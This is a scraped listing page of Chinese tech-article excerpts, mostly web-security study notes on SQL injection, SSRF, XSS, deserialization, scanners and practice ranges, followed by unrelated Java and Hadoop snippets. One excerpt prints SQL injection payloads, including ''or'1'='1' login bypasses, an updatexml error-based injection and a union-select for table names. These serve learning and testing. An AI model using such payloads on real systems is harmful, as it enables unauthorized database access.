target="_blank">WebWall-05.SQL-Inject(SQL注入漏洞)</a> <span class="text-muted">凯歌响起</span> <a class="tag" taget="_blank" href="/search/%23/1.htm">#</a><a class="tag" taget="_blank" href="/search/WebWall/1.htm">WebWall</a><a class="tag" taget="_blank" href="/search/sql/1.htm">sql</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E5%BA%93/1.htm">数据库</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a> <div>SQLInject漏洞原理概述数据库注入漏洞,主要是开发人员在构建代码时,没有对输入边界进行安全考虑,导致攻击者可以通过合法的输入点提交一些精心构造的语句,从而欺骗后台数据库对其进行执行,导致数据库信息泄露的一种漏洞。如何判断注入点类型以及常见的注入类型攻击流程第一步、注入点探测自动探测:使用web漏洞扫描工具,自动进行注入点发现手动方式:手动构造sqlinject测试语句进行注入点发现第二步、信</div> </li> <li><a href="/article/1754803410126782464.htm" title="SSRF:服务端请求伪造攻击" target="_blank">SSRF:服务端请求伪造攻击</a> <span class="text-muted">未知百分百</span> <a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/ssrf/1.htm">ssrf</a><a class="tag" taget="_blank" href="/search/php/1.htm">php</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a> <div>目录什么是SSRF?攻击内网应用端口扫描攻击非web应用pikachu中的SSRFcurl(端口扫描)file_get_content(读取文件)防御SSRF什么是SSRF?服务端请求伪造(ServerSideRequestForgery):是最近几年出现的一种web漏洞,2021年,SSRF被OWASP列为Top10web安全风险之一其形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功</div> </li> <li><a href="/article/1754576229245140992.htm" title="Web漏洞扫描器—AWVS" target="_blank">Web漏洞扫描器—AWVS</a> <span class="text-muted">InfI1traTe.</span> <a class="tag" taget="_blank" href="/search/Web%E5%88%A9%E7%94%A8/1.htm">Web利用</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E6%89%AB%E6%8F%8F%E6%B5%8B%E8%AF%95%E5%B7%A5%E5%85%B7/1.htm">扫描测试工具</a> <div>漏洞扫描漏洞扫描是指基于漏洞数据库,通过扫描等手段对指定的远程或者本地计算机系统的安全脆弱性进行检测,发现可利用漏洞的一种安全检测(渗透攻击)行为。Web漏洞扫描器针对于Web应用程序所开发的漏洞扫描器,例如SQL注入、XSS跨站脚本攻击等常见漏洞,进行主动式扫描探测是否存在漏洞。Web漏洞扫描器之间也有区别,例如对于XSS漏洞测试的扫描器,商业的漏洞扫描器和非商业性的漏洞扫描器。通过扫描器能够快</div> </li> <li><a href="/article/1754576100983324672.htm" title="web漏洞扫码工具" target="_blank">web漏洞扫码工具</a> <span class="text-muted">黑贝是条狗</span> <a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/php/1.htm">php</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a> <div>Invicti是一种自动化但完全可配置的Web应用程序安全扫描程序,使您能够扫描网站、Web应用程序和Web服务,并识别安全漏洞。Invicti可以扫描所有类型的Web应用程序,无论其构建平台或语言。Invicti是唯一一款能够以只读且安全的方式自动利用已识别漏洞以确认已识别问题的在线Web应用程序安全扫描程序。它还提供了漏洞证明,因此您无需浪费时间手动验证它。例如,在检测到SQL注入漏洞的情况下</div> </li> <li><a href="/article/1754263992123015168.htm" title="web漏洞“小迪安全课堂笔记”CSRF及SSRF" target="_blank">web漏洞“小迪安全课堂笔记”CSRF及SSRF</a> <span class="text-muted">小不为霸</span> <a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a> <div>小迪安全课堂笔记CSRF及SSRF什么是CSRF?怎么做?CSRF验证方式——burp防御方案SSRF服务器端请求伪造(Server-SideRequestForgery)漏洞攻击:端口扫描,指纹识别,漏洞利用,内网探针各个协议调用探针:http,file,dict,ftp,gopher等httpfile本地浏览协议dict协议ftp协议协议与脚本的关联什么是CSRF?怎么做?CSRF:跨站请求伪</div> </li> <li><a href="/article/1754110370580021248.htm" title="常见渗透测试靶场系统" target="_blank">常见渗透测试靶场系统</a> <span class="text-muted">bdcm</span> <div>OWASPBrokenWebApps分享渗透测试演练环境,里面继承了57个数据库的渗透测试环境。包括aspx,asp,php,jsp等等各种演练环境。http://pan.baidu.com/s/1o7VQPZk密码:09qz常见靶场DVWA(DamVulnerableWebApplication)DVWA是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了S</div> </li> <li><a href="/article/1753287115753406464.htm" title="web漏洞挖掘指南 -XSS跨站脚本攻击" target="_blank">web漏洞挖掘指南 -XSS跨站脚本攻击</a> <span class="text-muted">火线安全平台</span> <div>一、漏洞原理跨站脚本英文全称(CrossSiteScripting跨站脚本),为了不和css层叠样式表(英文全称:CascadingStyleSheets)混淆,因此将跨站脚本缩写为XSS。产生XSS漏洞根本原因其实是web应用未对用户的输入进行严格的过滤和转义,导致攻击者可从正常的输入功能注入脚本代码,我常将xss攻击理解为一种javascript注入,当带有xss恶意代码的页面被其他用户访问到</div> </li> <li><a href="/article/1752789970726174720.htm" title="浅谈SQL注入的四种防御方法" target="_blank">浅谈SQL注入的四种防御方法</a> <span class="text-muted">买Lemon也用劵</span> <a class="tag" taget="_blank" href="/search/SQL%E6%B3%A8%E5%85%A5/1.htm">SQL注入</a><a class="tag" taget="_blank" href="/search/php/1.htm">php</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a> <div>最近了解到安全公司的面试中都问到了很多关于SQL注入的一些原理和注入类型的问题,甚至是SQL注入的防御方法。SQL注入真的算是web漏洞中的元老了,著名且危害性极大。下面这里就简单的分享一下我总结的四种SQL注入防御手段,加深理解,方便下次遇到这种问题时可以直接拿来使用。(主要是怕面试中脑壳打铁,这种情况太常见了)SQL注入占我们渗透学习中极大地一部分,拥有这很重要的地位。随着防御手段的不段深入,</div> </li> <li><a href="/article/1752637633541980160.htm" title="安全测试-pikachu靶场搭建" target="_blank">安全测试-pikachu靶场搭建</a> <span class="text-muted">汪敏wangmin</span> <a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8%E6%B5%8B%E8%AF%95/1.htm">安全测试</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8%E6%80%A7%E6%B5%8B%E8%AF%95/1.htm">安全性测试</a> <div>pikachu靶场搭建文章目录pikachu安装步骤pikachupikachu是一个自带web漏洞的应用系统,在这里包含了常见的web安全漏洞,也就是练习的靶场。练习内容包括:1.暴力破解2.XSS3.CSRF4.SQL注入5.RCE6.文件包含7.不安全的文件下载8.不安全的文件上传9.越权10.目录遍历11.敏感信息泄露12.PHP反序列化13.XXE14.URL重定向15.SSRF安装步骤</div> </li> <li><a href="/article/1752612236146262016.htm" title="【小迪安全】web安全|渗透测试|网络安全 | 学习笔记-6" target="_blank">【小迪安全】web安全|渗透测试|网络安全 | 学习笔记-6</a> <span class="text-muted">youngerll</span> <a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/php/1.htm">php</a> <div>目录目录第37天:WEB漏洞-反序列化之PHP&JAVA全解(上)第38天:WEB漏洞-反序列化之PHP&JAVA全解(下)第39天:WEB漏洞-XXE&XML之利用检测绕过全解目录第37天:WEB漏洞-反序列化之PHP&JAVA全解(上)PHP反序列化原理:未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化过程,从而导致代码执行,SQL注入,目录遍历等不可控后果。在反序列化的过程中自</div> </li> <li><a href="/article/1752612109809631232.htm" title="【小迪安全】web安全|渗透测试|网络安全 | 学习笔记-5" target="_blank">【小迪安全】web安全|渗透测试|网络安全 | 学习笔记-5</a> <span class="text-muted">youngerll</span> <a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a> <div>目录目录第25天:WEB漏洞-XSS跨站之原理分类及攻击手法第26天:WEB漏洞-XSS跨站之订单及Shell箱子反杀记第27天:WEB漏洞-XSS跨站之代码及httponly绕过第28天:WEB漏洞-XSS跨站之WAF绕过及安全修复第29天:WEB漏洞-CSRF及SSRF漏洞案例讲解第30天:WEB漏洞-RCE代码及命令执行漏洞全解第31天:WEB漏洞-文件操作之文件包含漏洞全解第32天:WEB</div> </li> <li><a href="/article/1752432080760881152.htm" title="基于SQL注入漏洞的总结与归纳(个人学习 整理归纳复习" target="_blank">基于SQL注入漏洞的总结与归纳(个人学习 整理归纳复习</a> <span class="text-muted">曼达洛战士</span> <a class="tag" taget="_blank" href="/search/sql/1.htm">sql</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E5%BA%93/1.htm">数据库</a> <div>第一节我们首先要知道什么是SQL注入漏洞SQL注入常见的web漏洞,形成的主要原因是web应用程序在接收相关数据参数时未做好过滤,将其直接带入到数据库中查询,导致攻击者可以拼接执行构造的SQL语句。像这样我们输入?id=1我们可以获得id=1的信息这就是sql注入漏洞,可以通过sql的命令行去后台直接查询信息第二节SQL注入的产生原因原因:在前后端数据的交互中,前端的数据传到后台处理时,没有做严格</div> </li> <li><a href="/article/1752056262121504768.htm" title="任意文件下载" target="_blank">任意文件下载</a> <span class="text-muted">TOPKK7</span> <div>漏洞描述:目录遍历(任意文件下载)漏洞不同于网站目录浏览,此漏洞不仅仅可遍历系统下web中的文件,而且可以浏览或者下载到系统中的文件,攻击人员通过目录遍历攻击可以获取系统文件及服务器的配置文件等等。一般来说,他们利用服务器API、文件标准权限进行攻击。严格来说,目录遍历攻击并不是一种web漏洞,而是网站设计人员的设计“漏洞”。测试方法:通过web漏洞扫描工具对网站实施扫描可能发现目录遍历或者任意文</div> </li> <li><a href="/article/1751589681314676736.htm" title="<网络安全>《6 脆弱性扫描与管理系统》" target="_blank"><网络安全>《6 脆弱性扫描与管理系统》</a> <span class="text-muted">Ealser</span> <a class="tag" taget="_blank" href="/search/%23/1.htm">#</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a> <div>1概念脆弱性扫描与管理系统本质上就是系统漏洞扫描,简称漏扫。根据漏洞规则库(本地漏洞库、ActiveX库、网页木马库、网站代码审计规则库等)为基础,采用深度主机服务探测、Web智能化爬虫、SQL注入状态检测、主机配置检查以及弱口令检查等方式相结合的技术,实现了将Web漏洞扫描、系统漏洞扫描、数据库漏洞扫描、基线配置核查、工控漏洞检测与弱口令扫描于一体的综合漏洞评估系统。2一般功能系统漏扫:发现网络</div> </li> <li><a href="/article/1751047243298783232.htm" title="Windows下DVWA靶场和SQL-libs靶场搭建" target="_blank">Windows下DVWA靶场和SQL-libs靶场搭建</a> <span class="text-muted">LZsec</span> <a class="tag" taget="_blank" href="/search/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/1.htm">信息安全</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a> <div>今天咱们来聊聊像网安小白比较适合的靶场环境,比较著名的有DVWA靶场和SQL-libs靶场等等。DVWA靶场搭建简介DVWA是一款基于PHP和mysql开发的web靶场练习平台,集成了常见的web漏洞如sql注入,xss,密码破解等常见漏洞;适合刚基础网络安全的小白。1:PHPstudy安装首先我们需要安装phpstudy(推荐是2018版本的,比较好用一点),安装好后我们启动phpstudy,如</div> </li> <li><a href="/article/1750578917212700672.htm" title="java代码审计入门--01" target="_blank">java代码审计入门--01</a> <span class="text-muted">划水的小白白</span> <a class="tag" taget="_blank" href="/search/%E5%9F%BA%E7%A1%80%E9%97%B2%E8%81%8A%E7%AF%87/1.htm">基础闲聊篇</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/1.htm">代码审计</a> <div>入门知识总体目标方向先熟悉一些基本的流程安装配置对应环境与分析工具常规漏洞代码审计分析一些框架漏洞代码审计分析学习方向个人认为主要的方向如下:学习了解java的基本使用学习掌握常见Web漏洞的原理(注入、XSS、SSRF等)学习审计常见漏洞学习审计中间件框架的知识(weblogic、fastjson等)代码审计流程配置分析环境没什么说的,没环境还分析个锤子熟悉业务流程功能总体分为多少块,每一块的功</div> </li> <li><a href="/article/1750578532641161216.htm" title="简单总结一些常见Web漏洞" target="_blank">简单总结一些常见Web漏洞</a> <span class="text-muted">Hello_Brian</span> <a class="tag" taget="_blank" href="/search/Web%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/1.htm">Web渗透测试</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a> <div>SQL注入定义:SQL注入就是将SQL语句插入到用户提交的可控参数中,改变原有的SQL语义结构,从而执行攻击者所预期的结果。万能密码命令'or'1'='1'or1=1#1'||'11'||1#'=''-'报错注入id=0andupdatexml(1,concat(0x7e,database(),0x7e),1)联合注入-1'unionselect1,2,group_concat(table_nam</div> </li> <li><a href="/article/1750498208544473088.htm" title="web漏洞扫描——OpenVAS" target="_blank">web漏洞扫描——OpenVAS</a> <span class="text-muted">lainwith</span> <a class="tag" taget="_blank" href="/search/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/1.htm">渗透测试</a><a class="tag" taget="_blank" href="/search/web/1.htm">web</a> <div>介绍OpenVAS(OpenVulnerabilityAssessmentSystem),即开放式漏洞评估系统,是一个用于评估目标漏洞的杰出框架,开源且功能十分强大;它与著名的Nessus“本是同根生”,在Nessus商业化之后仍然坚持开源,号称“当前最好用的开源漏洞扫描工具”。最新版的KaliLinux不再自带OpenVAS了,需要自己部署OpenVAS漏洞检测系统。其核心部件是一个服务器,包括</div> </li> <li><a href="/article/1750069137792581632.htm" title="小迪安全学习笔记--第37天:web漏洞--反序列化之PHP和java全解(上)" target="_blank">小迪安全学习笔记--第37天:web漏洞--反序列化之PHP和java全解(上)</a> <span class="text-muted">铁锤2号</span> <a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8%E8%87%AA%E5%AD%A6%E7%AC%94%E8%AE%B0/1.htm">web安全自学笔记</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a> <div>PHP反序列化原理:未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化过程,从而导致代码执行,SQL注入,目录遍历等不可控后果。在反序列化的过程中自动触发了某些魔术方法。当进行反序列化的时候就有可能会触发对象中的一些魔术方法。serialize()//将一个对象转换成一个字符串unseriglize()//将字符串还原成一个对象触发:unserialize函数的变量可控,文件中存在可利</div> </li> <li><a href="/article/1750069138287509504.htm" title="小迪安全学习笔记--第38天:web漏洞-反序列化之PHP和JAVA全解(下)" target="_blank">小迪安全学习笔记--第38天:web漏洞-反序列化之PHP和JAVA全解(下)</a> <span class="text-muted">铁锤2号</span> <a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8%E8%87%AA%E5%AD%A6%E7%AC%94%E8%AE%B0/1.htm">web安全自学笔记</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a> <div>有个工具,ysoserial:https://github.com/frohoff/ysoserial概念序列化和反序列化序列化(serialization):将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。反序列化:从存储区中读取该数据,并将其还原为对象的过程,称为反序列化。靶场:webGoathttps://blog.csdn.net/</div> </li> <li><a href="/article/1750069009618845696.htm" title="WEB漏洞-反序列化之PHP&JAVA全解(上)" target="_blank">WEB漏洞-反序列化之PHP&JAVA全解(上)</a> <span class="text-muted">深白色耳机</span> <a class="tag" taget="_blank" href="/search/%E6%B8%97%E9%80%8F%E7%AC%94%E8%AE%B02/1.htm">渗透笔记2</a><a class="tag" taget="_blank" href="/search/php/1.htm">php</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a> <div>PHP反序列化原理:未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化过程,从而导致代码执行,SQL注入,目录遍历等不可控后果。在反序列化的过程中自动触发了某些魔术方法。当进行反序列化的时候就有可能会触发对象中的一些魔术方法。serialize()//将一个对象转换成一个字符串unserialize()//将字符串还原成一个对象触发:unserialize函数的变量可控,文件中存在可利</div> </li> <li><a href="/article/1750069010575147008.htm" title="WEB漏洞-反序列化之PHP&JAVA全解(下)" target="_blank">WEB漏洞-反序列化之PHP&JAVA全解(下)</a> <span class="text-muted">深白色耳机</span> <a class="tag" taget="_blank" href="/search/%E6%B8%97%E9%80%8F%E7%AC%94%E8%AE%B02/1.htm">渗透笔记2</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/php/1.htm">php</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a> <div>序列化和反序列化序列化(Serialization):将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。反序列化:从存储区中读取该数据,并将其还原为对象的过程,成为反序列化。小例子:使用writeObject()函数对person对象进行序列化,并把序列化后的字符串存入文件d:/person.txt中使用readObject()对文件d:/p</div> </li> <li><a href="/article/57.htm" title="多线程编程之join()方法" target="_blank">多线程编程之join()方法</a> <span class="text-muted">周凡杨</span> <a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/JOIN/1.htm">JOIN</a><a class="tag" taget="_blank" href="/search/%E5%A4%9A%E7%BA%BF%E7%A8%8B/1.htm">多线程</a><a class="tag" taget="_blank" href="/search/%E7%BC%96%E7%A8%8B/1.htm">编程</a><a class="tag" taget="_blank" href="/search/%E7%BA%BF%E7%A8%8B/1.htm">线程</a> <div>现实生活中,有些工作是需要团队中成员依次完成的,这就涉及到了一个顺序问题。现在有T1、T2、T3三个工人,如何保证T2在T1执行完后执行,T3在T2执行完后执行?问题分析:首先问题中有三个实体,T1、T2、T3, 因为是多线程编程,所以都要设计成线程类。关键是怎么保证线程能依次执行完呢?   Java实现过程如下: public class T1 implements Runnabl</div> </li> <li><a href="/article/184.htm" title="java中switch的使用" target="_blank">java中switch的使用</a> <span class="text-muted">bingyingao</span> <a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/enum/1.htm">enum</a><a class="tag" taget="_blank" href="/search/break/1.htm">break</a><a class="tag" taget="_blank" href="/search/continue/1.htm">continue</a> <div>java中的switch仅支持case条件仅支持int、enum两种类型。 用enum的时候,不能直接写下列形式。 switch (timeType) { case ProdtransTimeTypeEnum.DAILY: break; default: br</div> </li> <li><a href="/article/311.htm" title="hive having count 不能去重" target="_blank">hive having count 不能去重</a> <span class="text-muted">daizj</span> <a class="tag" taget="_blank" href="/search/hive/1.htm">hive</a><a class="tag" taget="_blank" href="/search/%E5%8E%BB%E9%87%8D/1.htm">去重</a><a class="tag" taget="_blank" href="/search/having+count/1.htm">having count</a><a class="tag" taget="_blank" href="/search/%E8%AE%A1%E6%95%B0/1.htm">计数</a> <div>hive在使用having count()是,不支持去重计数   hive (default)> select imei from t_test_phonenum where ds=20150701 group by imei having count(distinct phone_num)>1 limit 10;  FAILED: SemanticExcep</div> </li> <li><a href="/article/438.htm" title="WebSphere对JSP的缓存" target="_blank">WebSphere对JSP的缓存</a> <span class="text-muted">周凡杨</span> <a class="tag" taget="_blank" href="/search/WAS+JSP+%E7%BC%93%E5%AD%98/1.htm">WAS JSP 缓存</a> <div>      对于线网上的工程,更新JSP到WebSphere后,有时会出现修改的jsp没有起作用,特别是改变了某jsp的样式后,在页面中没看到效果,这主要就是由于websphere中缓存的缘故,这就要清除WebSphere中jsp缓存。要清除WebSphere中JSP的缓存,就要找到WAS安装后的根目录。        现服务</div> </li> <li><a href="/article/565.htm" title="设计模式总结" target="_blank">设计模式总结</a> <span class="text-muted">朱辉辉33</span> <a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E8%AE%BE%E8%AE%A1%E6%A8%A1%E5%BC%8F/1.htm">设计模式</a> <div>1.工厂模式   1.1 工厂方法模式 (由一个工厂类管理构造方法)      1.1.1普通工厂模式(一个工厂类中只有一个方法)      1.1.2多工厂模式(一个工厂类中有多个方法)      1.1.3静态工厂模式(将工厂类中的方法变成静态方法) &n</div> </li> <li><a href="/article/692.htm" title="实例:供应商管理报表需求调研报告" target="_blank">实例:供应商管理报表需求调研报告</a> <span class="text-muted">老A不折腾</span> <a class="tag" taget="_blank" href="/search/finereport/1.htm">finereport</a><a class="tag" taget="_blank" href="/search/%E6%8A%A5%E8%A1%A8%E7%B3%BB%E7%BB%9F/1.htm">报表系统</a><a class="tag" taget="_blank" href="/search/%E6%8A%A5%E8%A1%A8%E8%BD%AF%E4%BB%B6/1.htm">报表软件</a><a class="tag" taget="_blank" href="/search/%E4%BF%A1%E6%81%AF%E5%8C%96%E9%80%89%E5%9E%8B/1.htm">信息化选型</a> <div>引言 随着企业集团的生产规模扩张,为支撑全球供应链管理,对于供应商的管理和采购过程的监控已经不局限于简单的交付以及价格的管理,目前采购及供应商管理各个环节的操作分别在不同的系统下进行,而各个数据源都独立存在,无法提供统一的数据支持;因此,为了实现对于数据分析以提供采购决策,建立报表体系成为必须。 业务目标 1、通过报表为采购决策提供数据分析与支撑 2、对供应商进行综合评估以及管理,合理管理和</div> </li> <li><a href="/article/819.htm" title="mysql" target="_blank">mysql</a> <span class="text-muted">林鹤霄</span> <div>转载源:http://blog.sina.com.cn/s/blog_4f925fc30100rx5l.html mysql -uroot -p ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)   [root@centos var]# service mysql</div> </li> <li><a href="/article/946.htm" title="Linux下多线程堆栈查看工具(pstree、ps、pstack)" target="_blank">Linux下多线程堆栈查看工具(pstree、ps、pstack)</a> <span class="text-muted">aigo</span> <a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a> <div>原文:http://blog.csdn.net/yfkiss/article/details/6729364   1. pstree pstree以树结构显示进程$ pstree -p work | grep adsshd(22669)---bash(22670)---ad_preprocess(4551)-+-{ad_preprocess}(4552)  &n</div> </li> <li><a href="/article/1073.htm" title="html input与textarea 值改变事件" target="_blank">html input与textarea 值改变事件</a> <span class="text-muted">alxw4616</span> <a class="tag" taget="_blank" href="/search/JavaScript/1.htm">JavaScript</a> <div>// 文本输入框(input) 文本域(textarea)值改变事件 // onpropertychange(IE) oninput(w3c) $('input,textarea').on('propertychange input', function(event) {      console.log($(this).val()) });   </div> </li> <li><a href="/article/1200.htm" title="String类的基本用法" target="_blank">String类的基本用法</a> <span class="text-muted">百合不是茶</span> <a class="tag" taget="_blank" href="/search/String/1.htm">String</a> <div>  字符串的用法;     // 根据字节数组创建字符串 byte[] by = { 'a', 'b', 'c', 'd' }; String newByteString = new String(by);         1,length()  获取字符串的长度     &nbs</div> </li> <li><a href="/article/1327.htm" title="JDK1.5 Semaphore实例" target="_blank">JDK1.5 Semaphore实例</a> <span class="text-muted">bijian1013</span> <a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/thread/1.htm">thread</a><a class="tag" taget="_blank" href="/search/java%E5%A4%9A%E7%BA%BF%E7%A8%8B/1.htm">java多线程</a><a class="tag" taget="_blank" href="/search/Semaphore/1.htm">Semaphore</a> <div>Semaphore类        一个计数信号量。从概念上讲,信号量维护了一个许可集合。如有必要,在许可可用前会阻塞每一个 acquire(),然后再获取该许可。每个 release() 添加一个许可,从而可能释放一个正在阻塞的获取者。但是,不使用实际的许可对象,Semaphore 只对可用许可的号码进行计数,并采取相应的行动。 S</div> </li> <li><a href="/article/1454.htm" title="使用GZip来压缩传输量" target="_blank">使用GZip来压缩传输量</a> <span class="text-muted">bijian1013</span> <a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/GZip/1.htm">GZip</a> <div>        启动GZip压缩要用到一个开源的Filter:PJL Compressing Filter。这个Filter自1.5.0开始该工程开始构建于JDK5.0,因此在JDK1.4环境下只能使用1.4.6。         PJL Compressi</div> </li> <li><a href="/article/1581.htm" title="【Java范型三】Java范型详解之范型类型通配符" target="_blank">【Java范型三】Java范型详解之范型类型通配符</a> <span class="text-muted">bit1129</span> <a class="tag" taget="_blank" href="/search/java/1.htm">java</a> <div>    定义如下一个简单的范型类,   package com.tom.lang.generics; public class Generics<T> { private T value; public Generics(T value) { this.value = value; } } </div> </li> <li><a href="/article/1708.htm" title="【Hadoop十二】HDFS常用命令" target="_blank">【Hadoop十二】HDFS常用命令</a> <span class="text-muted">bit1129</span> <a class="tag" taget="_blank" href="/search/hadoop/1.htm">hadoop</a> <div>1. 修改日志文件查看器   hdfs oev -i edits_0000000000000000081-0000000000000000089 -o edits.xml cat edits.xml   修改日志文件转储为xml格式的edits.xml文件,其中每条RECORD就是一个操作事务日志   2. fsimage查看HDFS中的块信息等 &nb</div> </li> <li><a href="/article/1835.htm" title="怎样区别nginx中rewrite时break和last" target="_blank">怎样区别nginx中rewrite时break和last</a> <span class="text-muted">ronin47</span> <div>在使用nginx配置rewrite中经常会遇到有的地方用last并不能工作,换成break就可以,其中的原理是对于根目录的理解有所区别,按我的测试结果大致是这样的。 location /    {         proxy_pass http://test; </div> </li> <li><a href="/article/1962.htm" title="java-21.中兴面试题 输入两个整数 n 和 m ,从数列 1 , 2 , 3.......n 中随意取几个数 , 使其和等于 m" target="_blank">java-21.中兴面试题 输入两个整数 n 和 m ,从数列 1 , 2 , 3.......n 中随意取几个数 , 使其和等于 m</a> <span class="text-muted">bylijinnan</span> <a class="tag" taget="_blank" href="/search/java/1.htm">java</a> <div> import java.util.ArrayList; import java.util.List; import java.util.Stack; public class CombinationToSum { /* 第21 题 2010 年中兴面试题 编程求解: 输入两个整数 n 和 m ,从数列 1 , 2 , 3.......n 中随意取几个数 , 使其和等</div> </li> <li><a href="/article/2089.htm" title="eclipse svn 帐号密码修改问题" target="_blank">eclipse svn 帐号密码修改问题</a> <span class="text-muted">开窍的石头</span> <a class="tag" taget="_blank" href="/search/eclipse/1.htm">eclipse</a><a class="tag" taget="_blank" href="/search/SVN/1.htm">SVN</a><a class="tag" taget="_blank" href="/search/svn%E5%B8%90%E5%8F%B7%E5%AF%86%E7%A0%81%E4%BF%AE%E6%94%B9/1.htm">svn帐号密码修改</a> <div>问题描述:      Eclipse的SVN插件Subclipse做得很好,在svn操作方面提供了很强大丰富的功能。但到目前为止,该插件对svn用户的概念极为淡薄,不但不能方便地切换用户,而且一旦用户的帐号、密码保存之后,就无法再变更了。 解决思路:      删除subclipse记录的帐号、密码信息,重新输入</div> </li> <li><a href="/article/2216.htm" title="[电子商务]传统商务活动与互联网的结合" target="_blank">[电子商务]传统商务活动与互联网的结合</a> <span class="text-muted">comsci</span> <a class="tag" taget="_blank" href="/search/%E7%94%B5%E5%AD%90%E5%95%86%E5%8A%A1/1.htm">电子商务</a> <div>       某一个传统名牌产品,过去销售的地点就在某些特定的地区和阶层,现在进入互联网之后,用户的数量群突然扩大了无数倍,但是,这种产品潜在的劣势也被放大了无数倍,这种销售利润与经营风险同步放大的效应,在最近几年将会频繁出现。。。。        如何避免销售量和利润率增加的</div> </li> <li><a href="/article/2343.htm" title="java 解析 properties-使用 Properties-可以指定配置文件路径" target="_blank">java 解析 properties-使用 Properties-可以指定配置文件路径</a> <span class="text-muted">cuityang</span> <a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/properties/1.htm">properties</a> <div>#mq xdr.mq.url=tcp://192.168.100.15:61618; import java.io.IOException; import java.util.Properties; public class Test { String conf = "log4j.properties"; private static final</div> </li> <li><a href="/article/2470.htm" title="Java核心问题集锦" target="_blank">Java核心问题集锦</a> <span class="text-muted">darrenzhu</span> <a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E5%9F%BA%E7%A1%80/1.htm">基础</a><a class="tag" taget="_blank" href="/search/%E6%A0%B8%E5%BF%83/1.htm">核心</a><a class="tag" taget="_blank" href="/search/%E9%9A%BE%E7%82%B9/1.htm">难点</a> <div>注意,这里的参考文章基本来自Effective Java和jdk源码 